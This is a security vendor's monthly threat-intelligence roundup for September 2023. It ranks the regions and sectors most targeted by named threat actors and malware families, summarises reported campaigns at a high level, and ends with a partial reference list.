September 2023: Regions and Industries at Risk

The Red Report 2023

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, we aim to provide a comprehensive yet digestible analysis of the evolving threat landscape, including insights into the most targeted and at-risk sectors, industries, and regions by cybercriminals in the wild.

Our research is conducted throughout the entire month, utilizing a diverse range of resources that span across threat intelligence and malware dump platforms, blogs, exploit databases, sandboxes, and network data query results. We draw upon this wealth of information to provide you with a holistic understanding of the cyber threat environment, with a particular focus on dissecting malware campaigns, attack campaigns conducted by threat actors and advanced persistent threat (APT) groups, and new malware samples observed in the wild.

By following our monthly threat report, you'll be able to ascertain which threat actors or malware could potentially impact your sector, gauge if your country is being specifically targeted, and understand if there is a surge in threat activity correlated with geopolitical events or state-backed actions. 

Simulate Emerging Cyber Threats with 14-Day Free Trial of the Picus Platform

Top Four Most Targeted Regions in September

September 2023 has marked a significant surge in cyberattacks across the globe, underscoring the critical need for robust cybersecurity measures. 

 

Most Targeted Region

Threat Actor

Malware and Tools

1

Northern America 

Scattered Spider (a.k.a Muddled Libra, Scatter Swine) [1], Chinese Smishing Triad Gang [2], NoName057(16) Hacktivist Group (a.k.a NoName, NoNameHacktivistGroup) [3], GREF (a.k.a PT15, Ke3chang, Mirage, Vixen Panda, Playful Dragon) [4], Play Ransomware Gang [5], Anonymous Sudan Hacktivist Group [6], LockBit Ransomware Gang [7], Lucifer Threat Actor [8], Earth Estries APT ([9], [10]), Cactus Ransomware Group [11], BugProve Threat Actor [12], Storm-0558 Chinese hackers [13], Razor 1911 Threat Actor [14], Dunghill Ransomware Spreading group (with aliases Dark Angels Ransomware, Babuk Ransomware) [15], Medusa Ransomware Group [16], North Korean Threat Actors (with aliases TraderTraitor, Jade Sleet) [17], Lazarus APT Group [18], NSO Group [19], ALPHV (Blackcat) Ransomware Group [20], Storm-0324 Threat Group [21], Snatch Ransomware Gang [22], Akira Ransomware-as-a-Service Group [23], Scattered Spider (BlackCat) Ransomware [24], NoEscape Ransomware-as-a-Service [25]

0ktupus Malware [26], DDoSia Bot [3], BadBazaar Malware [4], Play Ransomware [5], LockBit Ransomware [7], Chae$ 4 Malware [8], Cactus Ransomware [11], PrintSpoofer, and KingHamlet [27], M3_Mini_Rat, PhoenixMiner, lolMiner Malware [28], JSSLoader, Gozi infostealer, Nymaim downloader/locker, GrandCrab ransomware, IcedID infostealer, Gookit and Dridex banking trojan, Sage ransomware [21] 

2

East Asia 

Earth Estries APT [9], P2PInfect Peer-to-Peer Worm [29], State-sponsored threat group, possibly linked to Russia (with aliases Pipedream, Controller [30]), TAG-74 Threat Actor [31], Five Families Hacktivist Group [32], Indian Cyber Force (ICF) hackers group [33], Andariel Threat Group [34], GREF [4], Flax Typhoon APT (a.k.a ETHEREAL PANDA) [35], Kimsuky APT (with aliases APT43, Emerald Sleet, Nickel Kimball, Velvet Chollima) [36] 

Zingdoor, TrillClient, HemiGate [9], P2PInfect Botnet Worm [29], BadOmen Malware [30], ReVBShell backdoor and Bisonal Malware [31], The 'Second Date' Cyber Espionage Tool [37], Sainbox RAT, Purple Fox, ValleyRAT [38], (Gh0st RAT, DTrack, YamaBot, NukeSped, Rifdoor, Phandoor, Andarat, Andaratm, TigerRAT, MagicRAT, EarlyRAT, QuiteRAT, Black RAT, Goat RAT, AndarLoader, DurianBeacon [34]) 

3

Europe 

Earth Estries APT ([9], [10]), GREF (a.k.a PT15, Ke3chang, Mirage, Vixen Panda, Playful Dragon) [4], Lucifer Threat Actor [8], W3LL Threat Actor [39], Cactus Ransomware Group [11], Scattered Spider (BlackCat) Ransomware [24]

Zingdoor, TrillClient, HemiGate [9], BadBazaar Malware [4], Chae$ 4 Malware [8], Cactus Ransomware [11], BugProve Threat Actor [12], M3_Mini_Rat, PhoenixMiner, lolMiner Malware [28], Scattered Spider Ransomware, BlackCat Ransomware [24], Pegasus Spyware [40], Redline Commodity Malware [41], Classiscam Scam-as-a-Service Program [42]

4

Southeast Asia 

Earth Estries APT [9], P2PInfect Peer-to-Peer Worm [29], Earth Lusca APT, Peach Sandstorm (with aliases HOLMIUM) [43], Garnesia Team (with aliases Mr.Heckers Ft. /RizkullSec) [44] 

Zingdoor, TrillClient, HemiGate [9], M3_Mini_Rat, PhoenixMiner, lolMiner Malware [28], P2PInfect Peer-to-Peer Worm [30], SprySOCKS [45] 

Table 1. Most Targeted Regions in September 2023.

Below, you will find more contextual information regarding the regions targeted by threat actors and malware campaigns.

September Cyber Sweep: Northern America (U.S.) in the 'Byte' of the Storm!

In September, the United States faced a diverse range of cyber threats from various sophisticated actors, each employing distinct techniques and targeting different sectors and platforms. 

The Lazarus APT group [18] engaged in activities aiming at the technology sector, exploiting vulnerabilities in Microsoft IIS servers and leveraging DLL side-loading techniques and third-party software vulnerabilities to compromise systems and inject malware, a clear indicator of their cyber espionage endeavors. 

The NSO Group [19] heightened the subtle infiltration capabilities by exploiting zero-click bugs in iOS, deploying Pegasus advanced spyware, affecting individual users, particularly within government sectors, unveiling subtle and pervasive vulnerabilities even in seemingly secure environments. Storm-0324 threat group [21] unfolded its multifaceted financial motives by compromising MS Teams chats, deploying an array of malware tools like JSSLoader, Gozi infostealer, and GrandCrab ransomware to target technology sectors, depicting their versatility in methods and tools. 

The NoEscape ransomware gang [25] penetrated the International Joint Commission, exposing risks within inter-agency collaborations and potential leaks of confidential data. GREF [4], or APT15, extended its global reach in cyber espionage by creating and spreading fake Signal and Telegram apps through official app stores, utilizing BadBazaar malware to steal user data across varied locations including China, Ukraine, and the United States, showcasing their intricate malicious software deployment capabilities. 

In analyzing these sophisticated threats, a comprehensive understanding of each actor's objectives, their targeted industries and regions, and the specific malware employed is essential, revealing the intricate impacts on individual, organizational, and national security and underlining the need for continuous enhancements in defense strategies and intelligence collaborations to address the evolving threat landscape.

Silver Surfer: East Asia Rides the Second Wave in Cyber Attack Rankings!

In September, the cyber threat landscape in East Asia experienced a notable influx of advanced attacks. The P2PInfect malware, a known peer-to-peer worm [29], manifested a significant surge in its activities, observing a 600-fold increase, primarily targeting systems in China, Singapore, Hong Kong, and Japan. This malware has been evolving, revealing a relentless enhancement in its malicious capabilities and a broadening spectrum of its reach and impact in the region.

Simultaneously, Omron, a prominent organization situated in Japan, encountered a series of cyber intrusions likely orchestrated by state-sponsored threat groups with probable links to Russia. These assailants systematically exploited a myriad of vulnerabilities inherent in PLC and engineering software, utilizing a distinctive malware named BadOmen [30].

Simultaneously, Chinese state-backed group TAG-74 [31] have been rigorously targeting South Korean government, political, and academic bodies, deploying malware like ReVBShell backdoor and Bisonal using advanced techniques involving .chm files. Furthermore, the hacktivist group Five Families [32], targeted the Taiwanese computer parts manufacturer, Biostar, obtaining sensitive customer and employee data, underlying potential significant consequences for the victim and its stakeholders

The Indian Cyber Force hackers group [33] has been notably active, delineating a timeline for potential attacks on multiple nations including Pakistan and China, elevating concerns around critical infrastructure. Similarly, Chinese APT groups, notably GREF [4] (also known as APT15, Ke3chang, Mirage, and Playful Dragon), have exploited legitimate platforms, infusing fake Signal and Telegram apps in official app stores, deploying malware like BadBazaar aimed at extensive data exfiltration from diverse geographical locations including the United States, Germany, and Spain.

Lazarus APT sub-group’s Andariel Cluster [34] and Flax Typhoon APT (a.k.a ETHEREAL PANDA) [35] continue to leverage an arsenal of malware like Gh0st RAT, DTrack, YamaBot, and China Chopper to infiltrate diverse sectors including finance, government, and technology in South Korea and Taiwan, underlying objectives of cyber espionage and sustained access. 

These activities signify an evolving and resilient threat landscape underpinned by an amalgamation of state-backed espionage, cybercrime operations, and advanced persistent threats, necessitating elevated cyber defense postures across impacted and potentially targeted regions.

Digital Battlefield: Europe Holds the Bronze Place in September’s Cyber Siege!

Europe is currently on heightened alert due to a spike in cyber threats from various internal and external entities. The Earth Estries APT (with aliases FamousSparrow [9]) group is notably demonstrating advanced cyber-espionage, exploiting CVE-2023-32315 and deploying BadBazaar Android malware and Kinsing malware through trojanized versions of Telegram and Signal to target several nations including the U.S., countries in Southeast Asia, and Germany in Europe [10]. In other sources, security researchers also saw that the group is leveraging malware named Zingdoor, TrillClient and HemiGate [9]. 

W3LL threat actors ([39], [46]) are compromising Microsoft 365 accounts using sophisticated phishing tools like W3LL Panel to circumvent multi-factor authentication, while the Cactus ransomware [11] group leverages known vulnerabilities to infiltrate corporations and disrupt operations. Vulnerabilities in Zavio’s security cameras, identified by BugProve [12], emphasize the crucial role of patch management in maintaining security.

Anonymous entities exploiting high-powered GPUs for illicit cryptocurrency mining and the GREF threat group (aliased APT15, Ke3chang, Mirage, Vixen Panda, Playful Dragon) [4],  focusing on malicious apps highlight the diversity of cyber threats and underscore the need for stringent security measures. Scattered Spider and BlackCat ransomware group’s [24] sophisticated attacks emphasize the escalating complexity and audacity of cybercriminal activities.

Lastly, the Ukraine-Russia conflict reflects the impact of geopolitical tensions on cyber activities, with the Redline commodity malware [41]  illustrating the broader implications of such disputes on global cybersecurity. 

In essence, the multifaceted nature of these cyber threats requires a comprehensive and collaborative approach to cybersecurity, emphasizing continual vigilance and innovation to protect against the evolving threat landscape.

Caught in the Net: Southeast Asia Navigates Through the Cyber Storm as the Fourth Most Targeted Region!

In September, the cyber threat landscape witnessed a surge of sophisticated attacks in Southeast Asia, with Earth Estries APT [9], a notable threat actor, engaging in cyber espionage activities. This group targeted government and technology sectors in various countries in Southeast Asia, including the Philippines and Malaysia. The actor exploits vulnerabilities such as CVE-2023-32315, deploying malware strains like BadBazaar Android malware and Kinsing to infiltrate systems and execute extensive data exfiltration. 

The unidentified entities have orchestrated crypto-mining attacks by weaponizing the legitimate Advanced Installer Tool, striking industries in countries like Singapore and Vietnam, utilizing malware such as M3_Mini_Rat and PhoenixMiner. Furthermore, the P2PInfect peer-to-peer malware has experienced a surge in activity, leaving a trail of infected systems primarily in China, Singapore, Hong Kong, and Japan. The Southeast Region also suffered from the MMRat Android banking Trojan [47]. Once installed, it abuses accessibility permissions to control victim devices and carry out bank fraud, signaling awareness against phishing websites. It is known that the malware is targeting mainly users in Indonesia, Vietnam, Singapore and Philippines [47].

Additionally, Earth Lusca APT group and the Iranian cyber espionage campaign, "Peach Sandstorm," [43] are marking their territories in Southeast Asia, Central Asia, and the Balkans, employing innovative cyber espionage techniques and focusing on government sectors. The hacktivist group, Garnesia Team [44], manifested its presence by launching a DDoS attack on the Ministry of Public Works and Housing in Indonesia, revealing its capabilities to disrupt government operations. 

The diverse spectrum of these cyber threats underscores the pivotal need for enhanced cyber defense mechanisms and elevated security postures across Southeast Asia to counter the multifaceted, dynamic threats it continually faces.

Top 5 Most Targeted Sectors in September

In September 2023, the Government and Administrations, Technology, Healthcare, Telecommunications and Education sectors emerged as the top five most targeted domains for cyber-attacks.

More comprehensive and detailed information is provided for each sector at the end of the blog.

 

Targeted Sector

Threat Actors

Malware

1

Governments and Administrations

Earth Estries APT ([9], [10]) NoName057(16) Hacktivist Group (a.k.a NoName, NoNameHacktivistGroup) [3], LockBit Ransomware Gang [7], Lucifer Threat Actor [8], NSO Group [19], Scattered Spider (BlackCat) Ransomware [24], LokiBot [48], NoEscape (Ransomware-as-a-service) [25], TAG-74 Threat Actor [31],  Earth Lusca APT [43], Peach Sandstorm (with aliases HOLMIUM) [43], Andariel APT group [34], Flax Typhoon APT (a.k.a ETHEREAL PANDA) [35], BlackCat Ransomware Gang [49], Lazarus APT [34], OilRig Threat Actor (with aliases APT34, Cobalt Gypsy, Hazel Sandstorm, Helix Kitten) [50] 

Zingdoor, TrillClient, HemiGate [9], DDoSia bot [3], LockBit Ransomware [7], Chae$ 4 Malware [8], BadBazaar and Kinsing Malware [10], Scattered Spider Ransomware, BlackCat Ransomware [24], ReVBShell Backdoor and Bisonal Malware [31], Gh0st RAT, DTrack, YamaBot, NukeSped, Rifdoor, Phandoor, Andarat, Andaratm, TigerRAT, MagicRAT, EarlyRAT, QuiteRAT, Black RAT, Goat RAT, AndarLoader, DurianBeacon [34], Pegasus Advanced Spyware App [19], Solar and Mango Malware [50]  

2

Technology

Scattered Spider [1], Earth Estries APT ([9], [10]), Storm-0558 Chinese hackers [13], North Korean Threat Actors (with aliases TraderTraitor, Jade Sleet) [17], Lazarus APT [18], Storm-0324 (with aliases TA543 and Sagrid) [21], LokiBot [48], APT29 (with aliases The Dukes and Cozy Bear) [51], Turla APT (with aliases Secret Blizzard) [52], Flax Typhoon [53]

Zingdoor, TrillClient, HemiGate [9], BadBazaar and Kinsing Malware ([9], [10]), JSSLoader, Gozi Infostealer, Nymaim Downloader/Locker, GrandCrab Ransomware, IcedID Infostealer, Gookit and Dridex Banking Trojan, Sage Ransomware [21], The 'Second Date' Cyber Espionage Tool [37], China Chopper [53]

3

Healthcare

Carthage, Claxton-Hepburn Hospitals Attack Campaign [54], LockBit Ransomware Gang [7], W3LL Panel Threat Actor [39], Just Kids Dental Attack Campaign [55], Snatch Ransomware Gang [22], Akira Ransomware-as-a-Service Group [23], LokiBot [48], Cl0p Ransomware Gang [56], LockBit Ransomware Gang [7], Ragnar Locker Ransomware Gang [57] 

LockBit Ransomware [7], BadBazaar and Kinsing Malware [10], Cl0p Ransomware [56] 

4

Telecommunication

Doubl threat actor (with aliases Emo) [58], Sandman Threat Actors [59], Charming Kitten (with aliases APT42, Ballistic Bobcat, Mint Sandstorm, NewsBeef) [60], Iranian state-sponsored threat actor Peach Sandstorm (HOLMIUM) [61], ShroudedSnooper Threat Actor [62] 

LuaDream Malware [59], Sponsor Malware [60], Python NodeStealer [61], HTTPSnoop, PipeSnoop [62] 

5

Education

LockBit Ransomware Gang [7], Medusa Ransomware Group [16], Andariel APT Group (with aliases Nicket Hyatt, Silent Chollima) [34], Flax Typhoon [53] (a.k.a ETHEREAL PANDA), Lazarus APT [34], Monti Ransomware Group [63], Ballistic Bobcat APT (with aliases APT35/APT42, Charming Kitten, TA453, or PHOSPHORUS) [64]

LockBit Ransomware [7], Gh0st RAT, DTrack, YamaBot, NukeSped, Rifdoor, Phandoor, Andarat, Andaratm, TigerRAT, MagicRAT, EarlyRAT, QuiteRAT, Black RAT, Goat RAT, AndarLoader, DurianBeacon [34], China Chopper [53], Sponsor Malware [64], PowerLess, Plink, Merlin Malware [65] 

Table 2. Most Targeted Sectors in September 2023.

Byte the Bullet: Governments in the Crosshairs of Cyber Chaos!

In September, multiple governments experienced cyber-attacks from various threat actors utilizing sophisticated malware. The International Joint Commission, a government entity between the United States and Canada, was targeted by the NoEscape Ransomware-as-a-Service [25], also known as Avaddon. 

South Korean academic, political, and government bodies fell victim to a cyber-espionage campaign orchestrated by the TAG-74 threat actor [31], employing .chm files and ReVBShell backdoor along with Bisonal malware. Earth Lusca APT [43], presumably China-aligned, targeted government departments across Southeast Asia, Central Asia, and the Balkans, deploying SprySOCKS and Trochilus malware

Peach Sandstorm, alias HOLMIUM [43], presumably Iranian, aimed its cyber-espionage campaigns at government departments, particularly focusing on those related to foreign affairs, technology, and telecommunications in Southeast Asia, Central Asia, and the Balkans, utilizing a range of advanced tactics and malware. 

Additionally, the Andariel APT [34] group (sub-group of Lazarus APT) targeted South Korean financial institutions, defense contractors, government agencies, and other sectors, employing a diverse array of malware, including Gh0st RAT, DTrack, and NukeSped, amongst others. Flax Typhoon APT [35], also known as ETHEREAL PANDA, concentrated its attacks on Taiwanese government organizations, utilizing legitimate software and tools like China Chopper and Metasploit for cyber espionage.

NSO Group [19] employed its potent Pegasus spyware to infiltrate smartphones of undisclosed government officials, extracting sensitive information. Finally, the NoName057(16) hacktivist group [3] executed attacks against unspecified government entities using undisclosed methodologies, driven by their hacktivist ideologies.

Data Dilemmas: Tech Titans Tangle with Second-Highest Security Breaches!

In September 2023, the Technology sector was heavily targeted by various cyber-attacks, underlining a critical need for reinforced cybersecurity. 

The technology companies, Microsoft and Facebook, were notably impacted. Earth Estries APT ([9], [10]), identified with aliases such as FamousSparrow and SparklingGoblin, utilized malware like Zingdoor, TrillClient, and HemiGate to perform cyber espionage on various tech entities, compromising technology companies and deploying advanced tactics like PowerShell downgrade attacks to infiltrate and siphon off valuable data. 

Microsoft experienced compromises from the Storm-0558 threat group [13], exploiting the corporate account of an engineer, leading to extensive unauthorized access across multiple organizations, and from Turla APT [52], alias Secret Blizzard, that tested the defenses of Microsoft 365 Defender through sophisticated multi-platform attacks. 

Facebook fell victim to APT29 [51], also known as The Dukes or Cozy Bear, which deployed custom malware and unprecedented tactics to compromise the personal information of millions of its users. Moreover, the infamous LokiBot [48] malware persisted in its relentless pursuit, exploiting vulnerabilities like CVE-2017-11882 in Microsoft Office, to steal a spectrum of crucial data from a variety of technology platforms. 

Dose of Digital Danger: September’s Healthcare Hack Attack Spike!

The healthcare sector remains under significant threat from diverse actors employing a range of sophisticated malware and attack vectors. For example, LockBit ransomware gang [7] has threatened corporations like CDW, putting sensitive healthcare data at risk, with intentions driven by ransom demands. LokiBot, a prevalent information stealer, has leveraged vulnerabilities like CVE-2017-11882 in Microsoft Office, aiming for data theft across various sectors, including healthcare. 

Another instance includes Just Kids Dental [55], which was targeted by unknown threat actors, leading to the compromise of personal and health information of nearly 130,000 individuals. Similarly, undisclosed actors targeted Carthage Area Hospital and Claxton Hepburn Medical Center [54], creating disruptions though no breach of patient information was reported in this case. 

The Akira ransomware-as-a-service group [23], meanwhile, has actively been targeting healthcare organizations, employing a double-extortion method and exploiting weaknesses in VPNs. Moreover, the Canadian Nurses Association experienced a breach from the Snatch ransomware gang [22], exposing sensitive information and risking identity theft and other malicious activities. 

Each of these instances underscores a persistent and evolving threat landscape, with actors leveraging both known and unknown vulnerabilities and tactics to compromise sensitive healthcare data, necessitating continual advancements in cybersecurity measures within the healthcare sector to protect against a multitude of cyber threats.

September Static: Telecommunications Sector Dialed into the Fourth Most Hacked Hotspot!

In September, the telecommunications sector faces intense and sophisticated cyber threats from diverse threat actors wielding innovative malware and advanced attack methods. 

Telecommunication service providers in the Middle East, for instance, have been besieged by ShroudedSnooper [62] using HTTPSnoop and PipeSnoop malware, allowing the remote execution of commands on infected devices and the monitoring of HTTP(S) traffic, significantly compromising the security infrastructure of the victim organizations. 

Unknown actors have exploited vulnerabilities in Atos Unify products, enabling potential full control over targeted systems through the execution of arbitrary PHP functions and operating system commands. Moreover, a persistent Iranian cyberespionage campaign named "Peach Sandstorm" [61] has been executing cyberattacks globally, utilizing Python NodeStealer malware to infiltrate and exfiltrate sensitive data from various sectors including telecommunications. 

Another threat actor, dubbed Sandman [59], targets telecommunication service providers across regions, deploying LuaDream malware to perform cyber espionage operations and gain long-term access to critical infrastructures. 

Charming Kitten [60], an Iran-linked cyberespionage group, has also left a significant imprint by infecting numerous organizations across sectors in Brazil, Israel, and the UAE with a newly identified backdoor. 

These relentless cyberattacks, exploiting both known and emerging vulnerabilities, underscore the urgent necessity for fortified cybersecurity defenses, vigilant monitoring, and international collaboration to protect and secure telecommunication infrastructures globally.

Classroom Chaos: Education Sector Schooled in Security, Ranking Fifth in September's Cyber Hit List!

In September, the education sector was prominently targeted by several threat actors deploying a variety of sophisticated malware. The Auckland University of Technology fell victim to the Monti ransomware group [63], which used Monti ransomware to infiltrate the university's IT environment, potentially disrupting operations and compromising data confidentiality and privacy. 

Additionally, educational institutions in South Korea were under siege from the Lazarus APT Group's Andariel [34] cluster. This threat actor unleashed a series of malware, including Gh0st RAT and DTrack, primarily focusing on cyber espionage and financial gain.

Within the United States, Crown Point Community Schools [66] and Minneapolis Public Schools experienced severe disruptions due to ransomware attacks. Crown Point faced an unidentified threat actor who initiated a ransomware attack via a phishing email, causing operational halt and a financial loss of $1 million. 

Minneapolis Public Schools [16] were breached by the Medusa ransomware group [16], affecting over 100,000 individuals and leveraging Medusa ransomware to compromise personal information of students, families, and staff members. Additionally, CDW Corporation, operating in the education sector among others, was targeted by the LockBit ransomware gang [7], who deployed LockBit ransomware and threatened to release sensitive information, underscoring the sector’s vulnerability to varied and escalating cyber threats.

These breaches underscore the varied and rising threats that educational institutions face, from well-known groups employing an array of sophisticated malware, to unidentified actors exploiting common vulnerabilities. 

References

[1] “More Okta Customers Trapped in Scattered Spider's Web” Available: ttps://go.theregister.com/feed/www.theregister.com/2023/09/01/okta_scattered_spider/

[2] D. Ahmed, “Chinese Smishing Triad Gang Hits US Users in Extensive Cybercrime Attack,” Hackread - Latest Cybersecurity News, Press Releases & Technology Today, Sep. 02, 2023. Available: https://www.hackread.com/chinese-smishing-triad-us-users-cybercrime-attack/. [Accessed: Sep. 29, 2023]

[3] “Undercover Researchers Decode Hidden Operations of NoName057(16),” The Cyber Express, Sep. 04, 2023. Available: https://thecyberexpress.com/undercover-researchers-noname05716/. [Accessed: Sep. 29, 2023]

[4] H. Rashid, “Chinese APT Slid Fake Signal and Telegram Apps onto Official App Stores,” Hackread - Latest Cybersecurity News, Press Releases & Technology Today, Sep. 04, 2023. Available: https://www.hackread.com/chinese-apt-fake-signal-telegram-app-stores/. [Accessed: Sep. 29, 2023]

[5] A. Khaitan, “Play Ransomware Group Strikes Luxury Hotel Chain, Claims Firmdale Hotels Data Breach,” The Cyber Express, Sep. 05, 2023. Available: https://thecyberexpress.com/firmdale-hotels-data-breach-play-ransomware/. [Accessed: Sep. 29, 2023]

[6] “ESPN Cyber Attack: Anonymous Sudan Targets ESPN Ahead of 2023 NFL Kickoff,” The Cyber Express, Sep. 05, 2023. Available: https://thecyberexpress.com/espn-cyber-attack-anonymous-sudan/. [Accessed: Sep. 29, 2023]

[7] A. Khaitan, “CDW Data Breach: LockBit Ransomware Threatens Corporation, Sets Deadline,” The Cyber Express, Sep. 05, 2023. Available: https://thecyberexpress.com/cdw-data-breach-lockbit-ransomware/. [Accessed: Sep. 29, 2023]

[8] “New Chae$ Variant Described.” Available: https://thecyberwire.com/newsletters/daily-briefing/12/169

[9] P. Nair and R. Ross, “‘Earth Estries’ APT Hackers Are Cyberespionage Pros.” Available: https://www.govinfosecurity.com/earth-estries-apt-hackers-are-cyberespionage-pros-a-22992. [Accessed: Sep. 29, 2023]

[10] “Fancy Bear and Camaro Dragon Sightings.” Available: https://thecyberwire.com/newsletters/research-briefing/5/26

[11] A. Khaitan, “Cactus Ransomware Group Hits 5 Global Corporations, Marfrig, Seymours Among Victims,” The Cyber Express, Sep. 06, 2023. Available: https://thecyberexpress.com/cactus-ransomware-group-major-corporations/. [Accessed: Oct. 01, 2023]

[12] E. Kovacs, “Dozens of Unpatched Flaws Expose Security Cameras Made by Defunct Company Zavio,” SecurityWeek, Sep. 06, 2023. Available: https://www.securityweek.com/dozens-of-unpatched-flaws-expose-security-cameras-made-by-defunct-company-zavio/. [Accessed: Oct. 01, 2023]

[13] S. Gatlan, “Hackers stole Microsoft signing key from Windows crash dump,” BleepingComputer, Sep. 06, 2023. Available: https://www.bleepingcomputer.com/news/microsoft/hackers-stole-microsoft-signing-key-from-windows-crash-dump/. [Accessed: Oct. 01, 2023]

[14] L. Abrams, “Rockstar Games reportedly sold games with Razor 1911 cracks on Steam,” BleepingComputer, Sep. 06, 2023. Available: https://www.bleepingcomputer.com/news/gaming/rockstar-games-reportedly-sold-games-with-razor-1911-cracks-on-steam/. [Accessed: Oct. 01, 2023]

[15] N. Goud, “Ransomware spreading gang reveals visa details of working employees in America,” Cybersecurity Insiders, Sep. 07, 2023. Available: https://www.cybersecurity-insiders.com/ransomware-spreading-gang-reveals-visa-details-of-working-employees-in-america/. [Accessed: Oct. 01, 2023]

[16] J. Warminsky, “Minneapolis school district says data breach affected more than 100,000 people.” Available: https://therecord.media/minneapolis-schools-say-data-breach-affected-100000. [Accessed: Oct. 01, 2023]

[17] 2023 THN Sep 08, “North Korean Hackers Exploit Zero-Day Bug to Target Cybersecurity Researchers,” The Hacker News, Sep. 08, 2023. Available: https://thehackernews.com/2023/09/north-korean-hackers-exploit-zero-day.html. [Accessed: Oct. 01, 2023]

[18] “Protecting Your Microsoft IIS Servers Against Malware Attacks,” The Hacker News, Sep. 08, 2023. Available: https://thehackernews.com/2023/09/protecting-your-microsoft-iis-servers.html. [Accessed: Oct. 01, 2023]

[19] M. Bagwe and R. Ross, “Apple Fixes Zero-Click Bugs Exploited by NSO Group’s Spyware.” Available: https://www.govinfosecurity.com/apple-fixes-zero-click-bugs-exploited-by-nso-groups-spyware-a-23042. [Accessed: Oct. 01, 2023]

[20] V. Pandagle, “MGM Resorts Cybersecurity Breach: Was a 10-Minute Chat All It Took?,” The Cyber Express, Sep. 13, 2023. Available: https://thecyberexpress.com/mgm-resorts-cyber-attack-alphv-group/. [Accessed: Oct. 01, 2023]

[21] D. Ahmed, “Storm-0324 Exploits MS Teams Chats to Facilitate Ransomware Attacks,” Hackread - Latest Cybersecurity News, Press Releases & Technology Today, Sep. 13, 2023. Available: https://www.hackread.com/storm-0324-exploits-ms-teams-chats-ransomware/. [Accessed: Oct. 01, 2023]

[22] “Website.” Available: https://thecyberwire.com/newsletters/privacy-briefing/5/175

[23] M. K. McGee and R. Ross, “Feds Warn Healthcare Sector of Akira Ransomware Threats.” Available: https://www.govinfosecurity.com/feds-warn-healthcare-sector-akira-ransomware-threats-a-23073. [Accessed: Oct. 01, 2023]

[24] N. Goud, “Two Ransomware Attack Stories currently trending on Google,” Cybersecurity Insiders, Sep. 14, 2023. Available: https://www.cybersecurity-insiders.com/two-ransomware-attack-stories-currently-trending-on-google/. [Accessed: Oct. 01, 2023]

[25] J. L. Hardcastle, “US-Canada water org confirms ‘cybersecurity incident’ after ransomware crew threatens leak,” The Register, Sep. 15, 2023. Available: https://www.theregister.com/2023/09/15/ijc_noescape_ransomware/. [Accessed: Oct. 01, 2023]

[26] 2023 THN Sep 02, “Okta Warns of Social Engineering Attacks Targeting Super Administrator Privileges,” The Hacker News, Sep. 02, 2023. Available: https://thehackernews.com/2023/09/okta-warns-of-social-engineering.html. [Accessed: Sep. 29, 2023]

[27] M. Bagwe and R. Ross, “Hackers Exploit Multiple Bugs in Hotel Booking Platform.” Available: https://www.govinfosecurity.com/hackers-exploit-multiple-bugs-in-hotel-booking-platform-a-23025. [Accessed: Oct. 01, 2023]

[28] B. Toulas, “Windows cryptomining attacks target graphic designer’s high-powered GPUs,” BleepingComputer, Sep. 07, 2023. Available: https://www.bleepingcomputer.com/news/security/windows-cryptomining-attacks-target-graphic-designers-high-powered-gpus/. [Accessed: Oct. 01, 2023]

[29] 2023 THN Sep 21, “Researchers Raise Red Flag on P2PInfect Malware with 600x Activity Surge,” The Hacker News, Sep. 21, 2023. Available: https://thehackernews.com/2023/09/researchers-raise-red-flag-on-p2pinfect.html. [Accessed: Oct. 01, 2023]

[30] E. Kovacs, “Omron Patches PLC, Engineering Software Flaws Discovered During ICS Malware Analysis,” SecurityWeek, Sep. 21, 2023. Available: https://www.securityweek.com/omron-patches-plc-engineering-software-flaws-discovered-during-ics-malware-analysis/. [Accessed: Oct. 01, 2023]

[31] T. S. Dutta, “Chinese Hackers use .chm Files to Hijack Execution Chain and Deploy Malware,” Cyber Security News, Sep. 21, 2023. Available: https://cybersecuritynews.com/chinese-hackers-chm-files/. [Accessed: Oct. 01, 2023]

[32] V. Pandagle, “Five Families Targets Taiwanese Computer Parts Manufacturer Biostar,” The Cyber Express, Sep. 08, 2023. Available: https://thecyberexpress.com/the-biostar-cyber-attack-five-families/. [Accessed: Oct. 01, 2023]

[33] A. Khaitan, “Indian Cyber Force Hackers Reveal Timeline for Targeted Cyber Attacks on Pakistan, China,” The Cyber Express, Sep. 06, 2023. Available: https://thecyberexpress.com/indian-cyber-force-targeted-cyber-attacks/. [Accessed: Oct. 01, 2023]

[34] 2023 THN Sep 05, “Researchers Warn of Cyber Weapons Used by Lazarus Group’s Andariel Cluster,” The Hacker News, Sep. 05, 2023. Available: https://thehackernews.com/2023/09/researchers-warn-of-cyber-weapons-used.html. [Accessed: Oct. 01, 2023]

[35] M. T. Intelligence, “Flax Typhoon using legitimate software to quietly access Taiwanese organizations,” Microsoft Security Blog, Aug. 24, 2023. Available: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/. [Accessed: Oct. 01, 2023]

[36] 2023 THN Sep 01, “New SuperBear Trojan Emerges in Targeted Phishing Attack on South Korean Activists,” The Hacker News, Sep. 01, 2023. Available: https://thehackernews.com/2023/09/new-superbear-trojan-emerges-in.html. [Accessed: Oct. 01, 2023]

[37] D. Robinson, “Pot calls the kettle hack as China claims Uncle Sam did digital sneak peek first,” The Register, Sep. 20, 2023. Available: https://www.theregister.com/2023/09/20/huawei_china_claims/. [Accessed: Oct. 01, 2023]

[38] 2023 THN Sep 20, “Sophisticated Phishing Campaign Targeting Chinese Users with ValleyRAT and Gh0st RAT,” The Hacker News, Sep. 20, 2023. Available: https://thehackernews.com/2023/09/sophisticated-phishing-campaign_20.html. [Accessed: Oct. 01, 2023]

[39] 2023 THN Sep 06, “W3LL Store: How a Secret Phishing Syndicate Targets 8,000+ Microsoft 365 Accounts,” The Hacker News, Sep. 06, 2023. Available: https://thehackernews.com/2023/09/w3ll-store-how-secret-phishing.html. [Accessed: Oct. 01, 2023]

[40] “Website.” Available: https://thecyberwire.com/stories/48e9cdff28e944a6b1a20214cbbc126f/ukraine-at-d567

[41] “Website.” Available: https://thecyberwire.com/stories/2b8ee4d70b8a47eb98b63aedd543eba4/ukraine-at-d564

[42] 2023 THN Sep 01, “Classiscam Scam-as-a-Service Raked $64.5 Million During the COVID-19 Pandemic,” The Hacker News, Sep. 01, 2023. Available: https://thehackernews.com/2023/09/classiscam-scam-as-service-raked-645.html. [Accessed: Oct. 02, 2023]

[43] “Website.” Available: https://thecyberwire.com/newsletters/research-briefing/5/38

